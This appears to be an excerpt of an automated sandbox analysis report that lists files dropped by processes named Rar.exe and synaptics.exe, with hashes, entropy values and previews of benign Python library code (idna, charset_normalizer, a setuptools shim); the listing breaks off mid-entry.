                                                                                                                                                                                                                                  SSDEEP:192:x1b00QwX/GbGxPGuCvLjjKe9vIjp6JDvHwWTbCt04gKd7NW3wLVi8w0FN/4Cldw:xEW2WWrLSt04ZUAz3Fx4Cldw
                                                                                                                                                                                                                                  MD5:921C1C9D4EC51242C94566CB4A45FA39
                                                                                                                                                                                                                                  SHA1:3C69EA1CED33F8F2C362FE2FC9EE1717935FD0D8
                                                                                                                                                                                                                                  SHA-256:8E3BDF4971C90FA40F831731231E2EB6C385C773F116CB1679FD48631037B8AB
                                                                                                                                                                                                                                  SHA-512:F702B83A4FD7052A0204DAB95C6A5892B025511F1E626B30A368A1C99DDDCED733E24AA82B584981589C6BB05C7EB54D50CB3364208F243650F7416C4B9C6152
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import importlib..import logging..import unicodedata..from codecs import IncrementalDecoder..from encodings.aliases import aliases..from functools import lru_cache..from re import findall..from typing import Generator, List, Optional, Set, Tuple, Union....from _multibytecodec import MultibyteIncrementalDecoder....from .constant import (.. ENCODING_MARKS,.. IANA_SUPPORTED_SIMILAR,.. RE_POSSIBLE_ENCODING_INDICATION,.. UNICODE_RANGES_COMBINED,.. UNICODE_SECONDARY_RANGE_KEYWORD,.. UTF8_MAXIMAL_ALLOCATION,..)......@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)..def is_accentuated(character: str) -> bool:.. try:.. description: str = unicodedata.name(character).. except ValueError:.. return False.. return (.. "WITH GRAVE" in description.. or "WITH ACUTE" in description.. or "WITH CEDILLA" in description.. or "WITH DIAERESIS" in description.. or "WITH CIRCUMFLEX" in description.. or "WITH TILDE" in description..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):85
                                                                                                                                                                                                                                  Entropy (8bit):4.459711237162507
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:IQVNHXL9vHutvyW7yRLrF6qgHzB:ImbMVyTF6fHzB
                                                                                                                                                                                                                                  MD5:CBABD0C4C4A929A4C7BD4CFEC9EE5DE2
                                                                                                                                                                                                                                  SHA1:5C05537610FF76D4C917A8FDEC4308F07BD20D8E
                                                                                                                                                                                                                                  SHA-256:AB77C5D76C46941B9AB9BE64AE84D9B7B9413D02CEDE416F327928127B7EE980
                                                                                                                                                                                                                                  SHA-512:E253662E6B293AAD35FC978FBD9A35EF30BF49F73F9FD09B4E73A7F3459D7952CEA8D7D36134ABDBD213EE60995A8A083E4E239205CC5522BEED7FC9C6935186
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Expose version.."""....__version__ = "3.3.2"..VERSION = __version__.split(".")..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):151
                                                                                                                                                                                                                                  Entropy (8bit):4.923660846981479
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:JSxYEVoC2gxAxCKKFuGA0jpSHEeGMMrMePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcrNB96W2y+Bk
                                                                                                                                                                                                                                  MD5:18D27E199B0D26EF9B718CE7FF5A8927
                                                                                                                                                                                                                                  SHA1:EA9C9BFC82AD47E828F508742D7296E69D2226E4
                                                                                                                                                                                                                                  SHA-256:2638CE9E2500E572A5E0DE7FAED6661EB569D1B696FCBA07B0DD223DA5F5D224
                                                                                                                                                                                                                                  SHA-512:B8504949F3DDF0089164B0296E8371D7DCDD4C3761FB17478994F5E6943966528A45A226EBA2D5286B9C799F0EB8C99BD20CBD8603A362532B3A65DD058FA42E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):868
                                                                                                                                                                                                                                  Entropy (8bit):4.508866310558911
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1mveEaF+vqnuZ9UeAlFYdsyGF66xorAqv:/LcsYdsye66+rf
                                                                                                                                                                                                                                  MD5:813A3685E48B6DC4359ACF6EDE226D5F
                                                                                                                                                                                                                                  SHA1:D4AF52A5C4F468358F49FE8CF0A91586958B9F91
                                                                                                                                                                                                                                  SHA-256:30FA8D0CB65B5EA19A35D5F1005862A853CA1105E3BB68CD42109ECBAFB97893
                                                                                                                                                                                                                                  SHA-512:9BF3422A73153476A88A02C0692E7E831B754D2FFA9858F1D4EF36EB1D9F33654672DEF22C8A0F392D9254FE64D66557AAD964923162B080DE6542B5A2E54952
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from .core import (. IDNABidiError,. IDNAError,. InvalidCodepoint,. InvalidCodepointContext,. alabel,. check_bidi,. check_hyphen_ok,. check_initial_combiner,. check_label,. check_nfc,. decode,. encode,. ulabel,. uts46_remap,. valid_contextj,. valid_contexto,. valid_label_length,. valid_string_length,.).from .intranges import intranges_contain.from .package_data import __version__..__all__ = [. "__version__",. "IDNABidiError",. "IDNAError",. "InvalidCodepoint",. "InvalidCodepointContext",. "alabel",. "check_bidi",. "check_hyphen_ok",. "check_initial_combiner",. "check_label",. "check_nfc",. "decode",. "encode",. "intranges_contain",. "ulabel",. "uts46_remap",. "valid_contextj",. "valid_contexto",. "valid_label_length",. "valid_string_length",.].
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):818
                                                                                                                                                                                                                                  Entropy (8bit):5.1134892336275835
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CSCSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/LcSzx5:pijeXL/whvOcAdtOb8fcjOb897cA
                                                                                                                                                                                                                                  MD5:6BFDC605B9EB2AA65A846B5C298D6829
                                                                                                                                                                                                                                  SHA1:E1E241B8BFC29FCD276ED0CE7F0130940F1EC5D7
                                                                                                                                                                                                                                  SHA-256:CFEBE48F48CB1CBE3B791704302423C190FB620DA36576C4C0CAB3054D811F38
                                                                                                                                                                                                                                  SHA-512:864B5A72BF805432D800E9D975DC77F14F9B642FA94DBA054787F7191BB95DA6879CC4F3050A5B3A834A1C66E4CA1849AEF1C7131047FDFEDF38D5BD5309A514
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....=C:\Users\Public\M20EKMMEH2\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9915
                                                                                                                                                                                                                                  Entropy (8bit):5.447135003519235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NePGIILf6bj+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:cPpIS+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                                                                  MD5:26139DE55A37341BDF55558330351D34
                                                                                                                                                                                                                                  SHA1:BC2D1D66E2B25C714413FB9C0E7372D4384ED2CD
                                                                                                                                                                                                                                  SHA-256:CCD489246654C417B243EB5651EFE7CE4B5B963531D78B6B053AC1319450EDC8
                                                                                                                                                                                                                                  SHA-512:73C888F044536D6EEFDB2018C12C28E0D3F6A48F457B7A937A8755A63A1871F4CE3BCA4BD6B3C4A58282735DBA6C99B78DBF123C9CA80002A3D426AC39D88CDD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198617
                                                                                                                                                                                                                                  Entropy (8bit):3.520847117635768
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:PIS0p2ZbbO4g3aD8yynBXmD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:P621S458yyP
                                                                                                                                                                                                                                  MD5:C5BE67379C9E175E6912B02E169DE926
                                                                                                                                                                                                                                  SHA1:B68261E7058A98BAE3485BD1E72F3042288A67A4
                                                                                                                                                                                                                                  SHA-256:F526693F256186AA7D2A82F8B87C9E0843B50DF7D57C69675AEE0FCA6181205A
                                                                                                                                                                                                                                  SHA-512:7C1D8FFC423B0FC6C0EB02061E7FFEAD367C323BC53A63B177631B4EF6591F02010CB769799F0AC748CDCD41B153FD69D69FDB05D8A2A67978E351726CFD5CFD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198617
                                                                                                                                                                                                                                  Entropy (8bit):3.520847117635768
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:PIS0p2ZbbO4g3aD8yynBXmD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:P621S458yyP
                                                                                                                                                                                                                                  MD5:C5BE67379C9E175E6912B02E169DE926
                                                                                                                                                                                                                                  SHA1:B68261E7058A98BAE3485BD1E72F3042288A67A4
                                                                                                                                                                                                                                  SHA-256:F526693F256186AA7D2A82F8B87C9E0843B50DF7D57C69675AEE0FCA6181205A
                                                                                                                                                                                                                                  SHA-512:7C1D8FFC423B0FC6C0EB02061E7FFEAD367C323BC53A63B177631B4EF6591F02010CB769799F0AC748CDCD41B153FD69D69FDB05D8A2A67978E351726CFD5CFD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1950
                                                                                                                                                                                                                                  Entropy (8bit):5.30991114223019
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:DrDo6itCRy/ORh72aGN+Rl/99X7iEvR9Bn:Drc7kR2BNC/9t7jvN
                                                                                                                                                                                                                                  MD5:F32A67671E3A2184F1AD34954CB352AB
                                                                                                                                                                                                                                  SHA1:876A49E3BD85D3116B388AA8E98F521B6B138275
                                                                                                                                                                                                                                  SHA-256:2C07149E3BCE0A8777D77344CBF4E1A8A8661923F8A1837CECA52B9A66743645
                                                                                                                                                                                                                                  SHA-512:FA3F167DB18B3BD7993514A2212E647209D2F196E5E627FCCDD03A48643AF1294D7C0823727558F34A1334322E4169BACB1C6FED96A7F98541B4571EEADF35EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):177
                                                                                                                                                                                                                                  Entropy (8bit):4.852106922029477
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/BAauletxbkCoeJ/Lt/lPlmuaHF5oXu5E5DVWrzSBw5JOmIOt2TgN:y/rqetGCow5GuaHKdArmBw5Ampt2s
                                                                                                                                                                                                                                  MD5:492AD7B58B744002000BF6678FB09728
                                                                                                                                                                                                                                  SHA1:64CB95059980DF90AA6A6EA5D8DDF5FB2345920E
                                                                                                                                                                                                                                  SHA-256:8840D3E9A1B7DDF1DD358A6C3332ABFCD05A6825F33D9F65616659AB05303869
                                                                                                                                                                                                                                  SHA-512:9BA8311AADAF4A00BB710C97300ED31ED2449AB5317938A3E7942295CAD8DF152D1D3A2F5C82FD6452FCBCEAC00C424EDF6BA488E7B7DD9B5D42B7C84534DA22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3422
                                                                                                                                                                                                                                  Entropy (8bit):4.317350903066924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Ej6Q796QeYUV+K6QZ7cgGlFi2Wa696Q+CFLcg2lFiIDnGvqvdm/WHqSJv:6/9CYUV1t7zGfihH9tLz2fiHiFdqSh
                                                                                                                                                                                                                                  MD5:ABCF05AEC6DB6B1DCEF409433F57FCD2
                                                                                                                                                                                                                                  SHA1:C326EA0E90CD4AD5638AB0C33A649080C002CEF3
                                                                                                                                                                                                                                  SHA-256:3C47B0DC8B70CE35B887299B6AC9EDCB6376397BCD7201C1F898EB06EC473D86
                                                                                                                                                                                                                                  SHA-512:7CE10E54C449901D0A092CD657AD7870FE8B72BB9654313715AC440D83709BE675B1016FDCB606F84D0B31410DA31CE81EDF995FE3481DEC924DB38AFCA79BF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import codecs.import re.from typing import Any, Optional, Tuple..from .core import IDNAError, alabel, decode, encode, ulabel.._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")...class Codec(codecs.Codec):. def encode(self, data: str, errors: str = "strict") -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return b"", 0.. return encode(data), len(data).. def decode(self, data: bytes, errors: str = "strict") -> Tuple[str, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return "", 0.. return decode(data), len(data)...class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handli
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                                                  Entropy (8bit):4.675723792199159
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYBFibXKGcQF6c8bNdPl6rZ9vUPLqBAII6A0vURy6QyneAJFHkwIDO:1REYBh618vPl6FCzTIL8Ry6fnbHIDO
                                                                                                                                                                                                                                  MD5:481871CD052957124183A01FED88B799
                                                                                                                                                                                                                                  SHA1:B422D026EFA3D16AEEB49683D2CC3CD62C26BBC1
                                                                                                                                                                                                                                  SHA-256:4732F2E90402765F7BF3868585BD845FD10A1822638343F73E294675E5D7731F
                                                                                                                                                                                                                                  SHA-512:C37ADAC2C04F58FE0EE9A1915EAA809050CA40B2008CFCF13124F76973D0725DC61D1EE59FD2A883BBD5CFE3C09A2DA782C9D1F1042641E35ACAC4C95EF416A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any, Union..from .core import decode, encode...def ToASCII(label: str) -> bytes:. return encode(label)...def ToUnicode(label: Union[bytes, bytearray]) -> str:. return decode(label)...def nameprep(s: Any) -> None:. raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol").
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13650
                                                                                                                                                                                                                                  Entropy (8bit):4.46864061978377
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xdqxD3m5oyqUN+Mt8rOrhNZjGs3Le+yrYfpR0cy1YQ7Up9uusBAgfwNKCx04SfSC:+iN/3Le+yrY/0j1YQUz+BHfOmfSC
                                                                                                                                                                                                                                  MD5:1AC8E75205145E83F27AF5E0A6C6A9EC
                                                                                                                                                                                                                                  SHA1:A29FFD855B5E2D971A25672E3043A1EB396FC3EB
                                                                                                                                                                                                                                  SHA-256:020D34602B8B6C8AD3BFBBA472E8F85CB68B63FC327810B3E67BBDAF6FC3DEE8
                                                                                                                                                                                                                                  SHA-512:38B3DD96ADD4CFB430C3D15AFE6A562B50CFD109495756C15E3C98758410CE084315AFF5B92CF5490C433F1BF04F56060605A6786B22AACB12A6AB45C1868AD2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import bisect.import re.import unicodedata.from typing import Optional, Union..from . import idnadata.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b"xn--"._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")._ldh = (. 48,. 49,. 50,. 51,. 52,. 53,. 54,. 55,. 56,. 57,. 95,. 97,. 98,. 99,. 100,. 101,. 102,. 103,. 104,. 105,. 106,. 107,. 108,. 109,. 110,. 111,. 112,. 113,. 114,. 115,. 116,. 117,. 118,. 119,. 120,. 121,. 122,.)...class IDNAError(UnicodeError):. """Base exception for all IDNA-encoding related problems""".. pass...class IDNABidiError(IDNAError):. """Exception when bidirectional requirements are not satisfied""".. pass...class InvalidCodepoint(IDNAError):. """Exception when a disallowed or unallocated codepoint is used""".. pass...class InvalidCodepointContext(IDNAError):. """Exception when the code
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79623
                                                                                                                                                                                                                                  Entropy (8bit):3.5629144753775273
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:9IFeZ8ek6rfUqCzfQnyUgMtsbruOz/yKae9hLXnoFDuZNBrVk+4VjIN:Dh3Uryyc6/MtF+T
                                                                                                                                                                                                                                  MD5:4B8AB107F7FD8DD839534F15B0722957
                                                                                                                                                                                                                                  SHA1:799F552EE255887C6E8504FCF6559CFCDF5B0C8B
                                                                                                                                                                                                                                  SHA-256:486F2385A184E778A20FA078F69B76A704EFFD4BC295C89613E379E28476A785
                                                                                                                                                                                                                                  SHA-512:C5E9ABFA9F900162EBA5E25D532508E7845AC1A33C679783A4AAFA094F5D88CC33BB02A353C95EFF1395F76BFB1EF93BB8E07543D3865CC6520248F313FFC1A4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file is automatically generated by tools/idna-data..__version__ = "16.0.0"..scripts = {. "Greek": (. 0x37000000374,. 0x37500000378,. 0x37A0000037E,. 0x37F00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038B,. 0x38C0000038D,. 0x38E000003A2,. 0x3A3000003E2,. 0x3F000000400,. 0x1D2600001D2B,. 0x1D5D00001D62,. 0x1D6600001D6B,. 0x1DBF00001DC0,. 0x1F0000001F16,. 0x1F1800001F1E,. 0x1F2000001F46,. 0x1F4800001F4E,. 0x1F5000001F58,. 0x1F5900001F5A,. 0x1F5B00001F5C,. 0x1F5D00001F5E,. 0x1F5F00001F7E,. 0x1F8000001FB5,. 0x1FB600001FC5,. 0x1FC600001FD4,. 0x1FD600001FDC,. 0x1FDD00001FF0,. 0x1FF200001FF5,. 0x1FF600001FFF,. 0x212600002127,. 0xAB650000AB66,. 0x101400001018F,. 0x101A0000101A1,. 0x1D2000001D246,. ),. "Han": (. 0x2E80
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                  Entropy (8bit):4.518518430134968
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:wicNAdy/ORhzgncCbZOvyp1NGq6vbqgCbHmgXikyXP:pcG5YcCI01NGq6mgCbHmYPy/
                                                                                                                                                                                                                                  MD5:1B295D1420A220F7472FBE79EC1EB0C1
                                                                                                                                                                                                                                  SHA1:6EAA004ADE4EE81378C86CEC87646DFF617BE72F
                                                                                                                                                                                                                                  SHA-256:6A652D91D8587101BC66BF82A0C33F91545A731922BC2D568313756FADCA29D5
                                                                                                                                                                                                                                  SHA-512:C11A52A64C46848780AAC49C2D6B61A4EBD6EC771198C8C470A3624BE7C8A9D2A8D7D9D3CAE90761A1EA75EDB867716FEE99C6409DBB91FBF74809EFB3E8800A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect.from typing import List, Tuple...def intranges_from_list(list_: List[int]) -> Tuple[int, ...]:. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i + 1 < len(sorted_list):. if sorted_list[i] == sorted_list[i + 1] - 1:. continue. current_range = sorted_list[last_write + 1 : i + 1]. ranges.append(_encode_range(cu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20
                                                                                                                                                                                                                                  Entropy (8bit):3.721928094887362
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:cvycP:8yI
                                                                                                                                                                                                                                  MD5:825C8CE5BF6CC089E5988E4E035D3025
                                                                                                                                                                                                                                  SHA1:58AA4F470ED582C69BFAD374B73471A2FB104506
                                                                                                                                                                                                                                  SHA-256:083F3DB50E23E8E03C9A92B8EA8F285CDB300FCB9DAF100703E6D89BCE0BA86A
                                                                                                                                                                                                                                  SHA-512:1B5914D72DFCAE9B728FAED20A6BE5AC09C5E912A38BD217222FF3CF94BFFAD64A5276000C3C3BFC2BB77D36D1F4516885720DCA9635E8A228078A798C51C0D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:__version__ = "3.9".
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):243725
                                                                                                                                                                                                                                  Entropy (8bit):4.1357991782001235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:a6xg7TWvNYBbPeVGKUJ8O8ng4Ynayk7z8:y
                                                                                                                                                                                                                                  MD5:BBAB719EA019C119FAF2E55A59FD2C9D
                                                                                                                                                                                                                                  SHA1:42C7CB4CD36A68FF4B1712A961B6B3845C1A1122
